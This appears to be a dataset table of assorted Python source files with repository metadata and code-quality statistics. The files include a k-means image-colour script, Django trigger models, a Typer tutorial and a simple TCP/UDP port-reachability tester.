hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c70bf8219d2bb2dabd3039c6feeeaba05de046c4 | 1,701 | py | Python | main.py | hasanzadeh99/mapna_test_2021 | 1e2e50a9aff32e2d730bf3d0fd20393e5aea0872 | [
"MIT"
] | null | null | null | main.py | hasanzadeh99/mapna_test_2021 | 1e2e50a9aff32e2d730bf3d0fd20393e5aea0872 | [
"MIT"
] | null | null | null | main.py | hasanzadeh99/mapna_test_2021 | 1e2e50a9aff32e2d730bf3d0fd20393e5aea0872 | [
"MIT"
] | null | null | null | import time
old_input_value = False
flag_falling_edge = None
start = None
flag_output_mask = False
DELAY_CONST = 10 # delay time from falling edge ... .
output = None
def response_function():
global old_input_value, flag_falling_edge, start, flag_output_mask, output
if flag_falling_edge:
output = True
end = time.perf_counter()
if end - start > DELAY_CONST:
output = 0
flag_falling_edge = 0
flag_output_mask = False
input_value = bool(int(input('Please Enter your Input Value: ')))
if old_input_value == False and input_value == True:
if not flag_output_mask: output = input_value
old_input_value = input_value
print('Input Rising Edge detected ... ')
print(f'output is: {output}')
elif old_input_value == False and input_value == False:
if not flag_output_mask: output = input_value
old_input_value = input_value
print(f'output is: {output}')
elif old_input_value == True and input_value == True:
old_input_value = input_value
if not flag_output_mask: output = input_value
print(f'output is: {output}')
elif old_input_value == True and input_value == False:
start = time.perf_counter()
print('Input Falling Edge detected ... ')
flag_falling_edge = True
flag_output_mask = True
old_input_value = input_value
print(f'output is: {output}')
if __name__ == '__main__':
DELAY_CONST=int(input("Hello \nPlease Enter Your delay value here :"))
while True:
response_function()
| 25.772727 | 79 | 0.621399 | 216 | 1,701 | 4.564815 | 0.212963 | 0.233266 | 0.131846 | 0.081136 | 0.43002 | 0.43002 | 0.39858 | 0.348884 | 0.323529 | 0.286004 | 0 | 0.003356 | 0.299236 | 1,701 | 65 | 80 | 26.169231 | 0.823826 | 0.019988 | 0 | 0.317073 | 0 | 0 | 0.139711 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02439 | false | 0 | 0.02439 | 0 | 0.04878 | 0.146341 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c70ef8c2db16a8357afdb58004c2cb5a69fd6d01 | 326 | py | Python | tests/conftest.py | badarsebard/terraform-pytest | 58c8096f0405ec1d0061723fc1dd2d099655c3c5 | [
"MIT"
] | null | null | null | tests/conftest.py | badarsebard/terraform-pytest | 58c8096f0405ec1d0061723fc1dd2d099655c3c5 | [
"MIT"
] | null | null | null | tests/conftest.py | badarsebard/terraform-pytest | 58c8096f0405ec1d0061723fc1dd2d099655c3c5 | [
"MIT"
] | 1 | 2021-11-19T16:36:31.000Z | 2021-11-19T16:36:31.000Z | from .terraform import TerraformManager
import pytest
from _pytest.tmpdir import TempPathFactory
@pytest.fixture(scope='session')
def tfenv(tmp_path_factory: TempPathFactory):
env_vars = {
}
with TerraformManager(path_factory=tmp_path_factory, env_vars=env_vars) as deployment:
yield deployment
| 25.076923 | 90 | 0.760736 | 38 | 326 | 6.289474 | 0.552632 | 0.138075 | 0.117155 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.171779 | 326 | 12 | 91 | 27.166667 | 0.885185 | 0 | 0 | 0 | 0 | 0 | 0.021472 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.333333 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
c71481b1ca69523b36b0345fe995b27fb6d37535 | 2,533 | py | Python | pythoncode/kmeansimage.py | loganpadon/PokemonOneShot | 22f9904250c8c90b4fe4573d6ca060fd9f95c1d3 | [
"MIT"
] | null | null | null | pythoncode/kmeansimage.py | loganpadon/PokemonOneShot | 22f9904250c8c90b4fe4573d6ca060fd9f95c1d3 | [
"MIT"
] | 1 | 2019-04-04T20:40:20.000Z | 2019-04-04T20:40:20.000Z | pythoncode/kmeansimage.py | loganpadon/PokemonOneShot | 22f9904250c8c90b4fe4573d6ca060fd9f95c1d3 | [
"MIT"
] | null | null | null | # import the necessary packages
from sklearn.cluster import KMeans
import skimage
import matplotlib.pyplot as plt
import argparse
import cv2
def mean_image(image,clt):
image2=image
for x in range(len(image2)):
classes=clt.predict(image2[x])
for y in range(len(classes)):
image2[x,y]=clt.cluster_centers_[classes[y]]
image2=skimage.color.lab2rgb(image2)
return image2
def plot_colors(hist, centroids):
# initialize the bar chart representing the relative frequency
# of each of the colors
bar = np.zeros((50, 300, 3), dtype = "uint8")
startX = 0
# loop over the percentage of each cluster and the color of
# each cluster
for (percent, color) in zip(hist, centroids):
print color
c = skimage.color.lab2rgb([[color]])
print c*255
# plot the relative percentage of each cluster
endX = startX + (percent * 300)
cv2.rectangle(bar, (int(startX), 0), (int(endX), 50),
c[0][0]*255, -1)
startX = endX
# return the bar chart
return bar
# import the necessary packages
import numpy as np
import cv2
def centroid_histogram(clt):
# grab the number of different clusters and create a histogram
# based on the number of pixels assigned to each cluster
numLabels = np.arange(0, len(np.unique(clt.labels_)) + 1)
(hist, _) = np.histogram(clt.labels_, bins = numLabels)
# normalize the histogram, such that it sums to one
hist = hist.astype("float")
hist /= hist.sum()
# return the histogram
return hist
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required = True, help = "Path to the image")
ap.add_argument("-c", "--clusters", required = True, type = int,
help = "# of clusters")
args = vars(ap.parse_args())
# load the image and convert it from BGR to RGB so that
# we can dispaly it with matplotlib
image = cv2.imread(args["image"])
image2 = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = skimage.color.rgb2lab(image2)
# show our image
plt.figure()
plt.axis("off")
plt.imshow(image2)
# reshape the image to be a list of pixels
imagedata = image.reshape((image.shape[0] * image.shape[1], 3))
# cluster the pixel intensities
clt = KMeans(n_clusters = args["clusters"])
clt.fit(imagedata)
hist = centroid_histogram(clt)
bar = plot_colors(hist, clt.cluster_centers_)
# show our color bar
plt.figure()
plt.axis("off")
plt.imshow(bar)
imagek=mean_image(image,clt)
plt.figure()
plt.axis("off")
plt.imshow(imagek)
plt.show()
| 28.460674 | 78 | 0.696802 | 378 | 2,533 | 4.621693 | 0.367725 | 0.013738 | 0.022324 | 0.027476 | 0.048082 | 0.048082 | 0.048082 | 0 | 0 | 0 | 0 | 0.023301 | 0.186735 | 2,533 | 88 | 79 | 28.784091 | 0.824757 | 0.281484 | 0 | 0.140351 | 0 | 0 | 0.04851 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.122807 | null | null | 0.035088 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c717ca8a8d1e158509ebb8f364af201eeca89e64 | 296 | py | Python | docs_src/options/callback/tutorial001.py | madkinsz/typer | a1520dcda685220a9a796288f5eaaebd00d68845 | [
"MIT"
] | 7,615 | 2019-12-24T13:08:20.000Z | 2022-03-31T22:07:53.000Z | docs_src/options/callback/tutorial001.py | madkinsz/typer | a1520dcda685220a9a796288f5eaaebd00d68845 | [
"MIT"
] | 351 | 2019-12-24T22:17:54.000Z | 2022-03-31T15:35:08.000Z | docs_src/options/callback/tutorial001.py | jina-ai/typer | 8b5e14b25ddf0dd777403015883301b17bedcee0 | [
"MIT"
] | 360 | 2019-12-24T15:29:59.000Z | 2022-03-30T20:33:10.000Z | import typer
def name_callback(value: str):
if value != "Camila":
raise typer.BadParameter("Only Camila is allowed")
return value
def main(name: str = typer.Option(..., callback=name_callback)):
typer.echo(f"Hello {name}")
if __name__ == "__main__":
typer.run(main)
| 18.5 | 64 | 0.658784 | 39 | 296 | 4.74359 | 0.538462 | 0.12973 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.199324 | 296 | 15 | 65 | 19.733333 | 0.780591 | 0 | 0 | 0 | 0 | 0 | 0.162162 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.111111 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c719c2fbf99902f8dda33cce99ae748883db934d | 3,276 | py | Python | qft-client-py2.py | bocajspear1/qft | 7a8f3bb5d24bf173489dc4ad6159021e9365e9c4 | [
"MIT"
] | null | null | null | qft-client-py2.py | bocajspear1/qft | 7a8f3bb5d24bf173489dc4ad6159021e9365e9c4 | [
"MIT"
] | null | null | null | qft-client-py2.py | bocajspear1/qft | 7a8f3bb5d24bf173489dc4ad6159021e9365e9c4 | [
"MIT"
] | null | null | null | import socket
import threading
from time import sleep
from threading import Thread
import json
import sys
def display_test(address, port,text_result, test):
if (text_result == "QFT_SUCCESS" and test == True) or (text_result != "QFT_SUCCESS" and test == False):
# Test is correct
print "PASSED: Test for " + str(address) + ":" + str(port) + " resulted in " + str(test)
else:
print "FAILED: Test for " + str(address) + ":" + str(port) + " did not result in " + str(test)
def TCPTest(address, port, test):
try:
my_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
my_socket.settimeout(2)
my_socket.connect((address, port))
fileobj = my_socket.makefile("rw")
fileobj.write('QFT_REQUEST\n')
fileobj.flush()
result = fileobj.readline().strip()
display_test(address, port, result, test)
except socket.error as e:
#print(e)
display_test(address, port, "FAILED", test)
except socket.timeout as e:
display_test(address, port, "FAILED", test)
my_socket.close()
def UDPTest(address, port, test):
try:
my_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
my_socket.settimeout(2)
my_socket.sendto("QFT_REQUEST".encode('utf-8'), (address, port))
# receive data from client (data, addr)
d = my_socket.recvfrom(1024)
reply = d[0]
addr = d[1]
result = d[0].decode('utf-8').strip()
display_test(address, port, result, test)
except socket.timeout as e:
display_test(address, port, "FAILED", test)
try:
timeout = 5
if len(sys.argv) > 1:
if (len(sys.argv) -1 ) % 2 != 0:
print "\nInvalid number of arguments\n\n-t Time between tests in seconds\n"
sys.exit()
else:
if sys.argv[1] == "-t" and sys.argv[2].isdigit() and int(sys.argv[2]) > 2:
timeout = int(sys.argv[2])
else:
print "\nInvalid arguments\n\n-t Time between tests in seconds\n"
sys.exit()
print "\nqft-client.py v1.s\n\n"
json_cfg = json.loads(open("client.cfg").read())
print "Config loaded. Starting tests in 1 second...\n\n"
sleep(1)
while True:
for item in json_cfg:
if item["type"] == "tcp":
t = Thread(target=TCPTest, args=( item["remote_address"], item["port"], item["test_for"]))
elif item["type"] == "udp":
t = Thread(target=UDPTest, args=( item["remote_address"], item["port"], item["test_for"]))
else:
print "Invalid Type!"
t.start()
sleep(timeout)
print "\n=======================================================\n"
except IOError as e:
print("Config file, client.cfg, not found")
sys.exit()
except ValueError as e:
print("Error in config JSON")
sys.exit()
| 30.616822 | 108 | 0.514042 | 387 | 3,276 | 4.268734 | 0.30491 | 0.066586 | 0.065375 | 0.079903 | 0.423123 | 0.407385 | 0.312954 | 0.2954 | 0.2954 | 0.197337 | 0 | 0.011225 | 0.347375 | 3,276 | 106 | 109 | 30.90566 | 0.761459 | 0.01862 | 0 | 0.28169 | 0 | 0 | 0.175845 | 0.019002 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.014085 | 0.084507 | null | null | 0.140845 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c71ef3a9007aa0aebc08a606ded35bff47c69406 | 242 | py | Python | cnn/struct/layer/parse_tensor_module.py | hslee1539/GIS_GANs | 6901c830b924e59fd06247247db3f925bab26583 | [
"MIT"
] | null | null | null | cnn/struct/layer/parse_tensor_module.py | hslee1539/GIS_GANs | 6901c830b924e59fd06247247db3f925bab26583 | [
"MIT"
] | null | null | null | cnn/struct/layer/parse_tensor_module.py | hslee1539/GIS_GANs | 6901c830b924e59fd06247247db3f925bab26583 | [
"MIT"
] | null | null | null | from tensor.main_module import Tensor
import numpy as np
def getTensor(value):
if type(value) is np.ndarray:
return Tensor.numpy2Tensor(value)
elif type(value) is Tensor:
return value
else:
raise Exception | 24.2 | 41 | 0.68595 | 33 | 242 | 5 | 0.636364 | 0.109091 | 0.133333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005525 | 0.252066 | 242 | 10 | 42 | 24.2 | 0.906077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c72423d0c9647d3f45e1ae401dca8a26496518f2 | 265 | py | Python | HackerRank/Calendar Module/solution.py | nikku1234/Code-Practise | 94eb6680ea36efd10856c377000219285f77e5a4 | [
"Apache-2.0"
] | 9 | 2020-07-02T06:06:17.000Z | 2022-02-26T11:08:09.000Z | HackerRank/Calendar Module/solution.py | nikku1234/Code-Practise | 94eb6680ea36efd10856c377000219285f77e5a4 | [
"Apache-2.0"
] | 1 | 2021-11-04T17:26:36.000Z | 2021-11-04T17:26:36.000Z | HackerRank/Calendar Module/solution.py | nikku1234/Code-Practise | 94eb6680ea36efd10856c377000219285f77e5a4 | [
"Apache-2.0"
] | 8 | 2021-01-31T10:31:12.000Z | 2022-03-13T09:15:55.000Z | # Enter your code here. Read input from STDIN. Print output to STDOUT
import calendar
mm,dd,yyyy = map(int,input().split())
day = ["MONDAY","TUESDAY","WEDNESDAY","THURSDAY","FRIDAY","SATURDAY","SUNDAY"]
val = int (calendar.weekday(yyyy,mm,dd))
print(day[val])
| 22.083333 | 78 | 0.698113 | 39 | 265 | 4.74359 | 0.769231 | 0.043243 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116981 | 265 | 11 | 79 | 24.090909 | 0.790598 | 0.25283 | 0 | 0 | 0 | 0 | 0.25641 | 0 | 0 | 0 | 0 | 0.090909 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7245a8913ae3a1c31f00b1392df9f4dd3d991e9 | 7,560 | py | Python | scale/trigger/models.py | stevevarner/scale | 9623b261db4ddcf770f00df16afc91176142bb7c | [
"Apache-2.0"
] | null | null | null | scale/trigger/models.py | stevevarner/scale | 9623b261db4ddcf770f00df16afc91176142bb7c | [
"Apache-2.0"
] | null | null | null | scale/trigger/models.py | stevevarner/scale | 9623b261db4ddcf770f00df16afc91176142bb7c | [
"Apache-2.0"
] | null | null | null | """Defines the models for trigger rules and events"""
from __future__ import unicode_literals
import django.contrib.postgres.fields
from django.db import models, transaction
from django.utils.timezone import now
class TriggerEventManager(models.Manager):
"""Provides additional methods for handling trigger events
"""
def create_trigger_event(self, trigger_type, rule, description, occurred):
"""Creates a new trigger event and returns the event model. The given rule model, if not None, must have already
been saved in the database (it must have an ID). The returned trigger event model will be saved in the database.
:param trigger_type: The type of the trigger that occurred
:type trigger_type: str
:param rule: The rule that triggered the event, possibly None
:type rule: :class:`trigger.models.TriggerRule`
:param description: The JSON description of the event as a dict
:type description: dict
:param occurred: When the event occurred
:type occurred: :class:`datetime.datetime`
:returns: The new trigger event
:rtype: :class:`trigger.models.TriggerEvent`
"""
if trigger_type is None:
raise Exception('Trigger event must have a type')
if description is None:
raise Exception('Trigger event must have a JSON description')
if occurred is None:
raise Exception('Trigger event must have a timestamp')
event = TriggerEvent()
event.type = trigger_type
event.rule = rule
event.description = description
event.occurred = occurred
event.save()
return event
class TriggerEvent(models.Model):
"""Represents an event where a trigger occurred
:keyword type: The type of the trigger that occurred
:type type: :class:`django.db.models.CharField`
:keyword rule: The rule that triggered this event, possibly None (some events are not triggered by rules)
:type rule: :class:`django.db.models.ForeignKey`
:keyword description: JSON description of the event. This will contain fields specific to the type of the trigger
that occurred.
:type description: :class:`django.contrib.postgres.fields.JSONField`
:keyword occurred: When the event occurred
:type occurred: :class:`django.db.models.DateTimeField`
"""
type = models.CharField(db_index=True, max_length=50)
rule = models.ForeignKey('trigger.TriggerRule', blank=True, null=True, on_delete=models.PROTECT)
description = django.contrib.postgres.fields.JSONField(default=dict)
occurred = models.DateTimeField(db_index=True)
objects = TriggerEventManager()
class Meta(object):
"""meta information for the db"""
db_table = 'trigger_event'
class TriggerRuleManager(models.Manager):
"""Provides additional methods for handling trigger rules
"""
@transaction.atomic
def archive_trigger_rule(self, trigger_rule_id):
"""Archives the trigger rule (will no longer be active) with the given ID
:param trigger_rule_id: The ID of the trigger rule to archive
:type trigger_rule_id: int
"""
rule = TriggerRule.objects.select_for_update().get(pk=trigger_rule_id)
rule.is_active = False
rule.archived = now()
rule.save()
def create_trigger_rule(self, trigger_type, configuration, name='', is_active=True):
"""Creates a new trigger rule and returns the rule model. The returned trigger rule model will be saved in the
database.
:param trigger_type: The type of this trigger rule
:type trigger_type: str
:param configuration: The rule configuration
:type configuration: :class:`trigger.configuration.TriggerRuleConfiguration`
:param name: An optional name for the trigger
:type name: str
:param is_active: Whether or not the trigger should be active
:type is_active: bool
:returns: The new trigger rule
:rtype: :class:`trigger.models.TriggerRule`
:raises trigger.configuration.exceptions.InvalidTriggerRule: If the configuration is invalid
"""
if not trigger_type:
raise Exception('Trigger rule must have a type')
if not configuration:
raise Exception('Trigger rule must have a configuration')
configuration.validate()
rule = TriggerRule()
rule.type = trigger_type
rule.name = name
rule.is_active = is_active
rule.configuration = configuration.get_dict()
rule.save()
return rule
def get_by_natural_key(self, name):
"""Django method to retrieve a trigger rule for the given natural key. NOTE: All trigger rule names are NOT
unique. This is implemented to allow the loading of defined system trigger rules which do have unique names.
:param name: The name of the trigger rule
:type name: str
:returns: The trigger rule defined by the natural key
:rtype: :class:`error.models.Error`
"""
return self.get(name=name)
class TriggerRule(models.Model):
"""Represents a rule that, when triggered, creates a trigger event
:keyword type: The type of the trigger for the rule
:type type: :class:`django.db.models.CharField`
:keyword name: The identifying name of the trigger rule used by clients for queries
:type name: :class:`django.db.models.CharField`
:keyword configuration: JSON configuration for the rule. This will contain fields specific to the type of the
trigger.
:type configuration: :class:`django.contrib.postgres.fields.JSONField`
:keyword is_active: Whether the rule is still active (false once rule is archived)
:type is_active: :class:`django.db.models.BooleanField`
:keyword created: When the rule was created
:type created: :class:`django.db.models.DateTimeField`
:keyword archived: When the rule was archived (no longer active)
:type archived: :class:`django.db.models.DateTimeField`
:keyword last_modified: When the rule was last modified
:type last_modified: :class:`django.db.models.DateTimeField`
"""
type = models.CharField(max_length=50, db_index=True)
name = models.CharField(blank=True, max_length=50)
configuration = django.contrib.postgres.fields.JSONField(default=dict)
is_active = models.BooleanField(default=True, db_index=True)
created = models.DateTimeField(auto_now_add=True)
archived = models.DateTimeField(blank=True, null=True)
last_modified = models.DateTimeField(auto_now=True)
objects = TriggerRuleManager()
def get_configuration(self):
"""Returns the configuration for this trigger rule
:returns: The configuration for this trigger rule
:rtype: :class:`trigger.configuration.trigger_rule.TriggerRuleConfiguration`
:raises :class:`trigger.configuration.exceptions.InvalidTriggerType`: If the trigger type is invalid
"""
from trigger.handler import get_trigger_rule_handler
handler = get_trigger_rule_handler(self.type)
return handler.create_configuration(self.configuration)
def natural_key(self):
"""Django method to define the natural key for a trigger rule as the name
:returns: A tuple representing the natural key
:rtype: tuple(str,)
"""
return (self.name,)
class Meta(object):
"""meta information for the db"""
db_table = 'trigger_rule'
| 38.769231 | 120 | 0.693783 | 958 | 7,560 | 5.399791 | 0.178497 | 0.055287 | 0.022617 | 0.033056 | 0.313938 | 0.268123 | 0.246279 | 0.1734 | 0.096656 | 0.060313 | 0 | 0.001027 | 0.227116 | 7,560 | 194 | 121 | 38.969072 | 0.884306 | 0.533598 | 0 | 0.060606 | 0 | 0 | 0.072185 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.075758 | 0 | 0.530303 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c724c503b44eb473d695fa13f0446956650e0c2b | 987 | py | Python | barriers/models/history/assessments/economic_impact.py | felix781/market-access-python-frontend | 3b0e49feb4fdf0224816326938a46002aa4a2b1c | [
"MIT"
] | 1 | 2021-12-15T04:14:03.000Z | 2021-12-15T04:14:03.000Z | barriers/models/history/assessments/economic_impact.py | felix781/market-access-python-frontend | 3b0e49feb4fdf0224816326938a46002aa4a2b1c | [
"MIT"
] | 19 | 2019-12-11T11:32:47.000Z | 2022-03-29T15:40:57.000Z | barriers/models/history/assessments/economic_impact.py | felix781/market-access-python-frontend | 3b0e49feb4fdf0224816326938a46002aa4a2b1c | [
"MIT"
] | 2 | 2021-02-09T09:38:45.000Z | 2021-03-29T19:07:09.000Z | from ..base import BaseHistoryItem, GenericHistoryItem
from ..utils import PolymorphicBase
class ArchivedHistoryItem(BaseHistoryItem):
field = "archived"
field_name = "Valuation assessment: Archived"
def get_value(self, value):
if value is True:
return "Archived"
elif value is False:
return "Unarchived"
class ExplanationHistoryItem(BaseHistoryItem):
field = "explanation"
field_name = "Valuation assessment: Explanation"
class ImpactHistoryItem(BaseHistoryItem):
field = "impact"
field_name = "Valuation assessment: Impact"
def get_value(self, value):
if value:
return value.get("name")
class EconomicImpactAssessmentHistoryItem(PolymorphicBase):
model = "economic_impact_assessment"
key = "field"
subclasses = (
ArchivedHistoryItem,
ExplanationHistoryItem,
ImpactHistoryItem,
)
default_subclass = GenericHistoryItem
class_lookup = {}
| 24.675 | 59 | 0.68997 | 85 | 987 | 7.905882 | 0.435294 | 0.089286 | 0.080357 | 0.125 | 0.080357 | 0.080357 | 0.080357 | 0 | 0 | 0 | 0 | 0 | 0.235056 | 987 | 39 | 60 | 25.307692 | 0.890066 | 0 | 0 | 0.068966 | 0 | 0 | 0.171226 | 0.026342 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068966 | false | 0 | 0.068966 | 0 | 0.758621 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c727467c9c5f9cbcf49804ff4103bf27f2140c3f | 1,504 | py | Python | botorch/acquisition/__init__.py | jmren168/botorch | 6c067185f56d3a244c4093393b8a97388fb1c0b3 | [
"MIT"
] | 1 | 2020-03-29T20:06:45.000Z | 2020-03-29T20:06:45.000Z | botorch/acquisition/__init__.py | jmren168/botorch | 6c067185f56d3a244c4093393b8a97388fb1c0b3 | [
"MIT"
] | null | null | null | botorch/acquisition/__init__.py | jmren168/botorch | 6c067185f56d3a244c4093393b8a97388fb1c0b3 | [
"MIT"
] | 1 | 2020-03-29T20:06:48.000Z | 2020-03-29T20:06:48.000Z | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from .acquisition import AcquisitionFunction
from .analytic import (
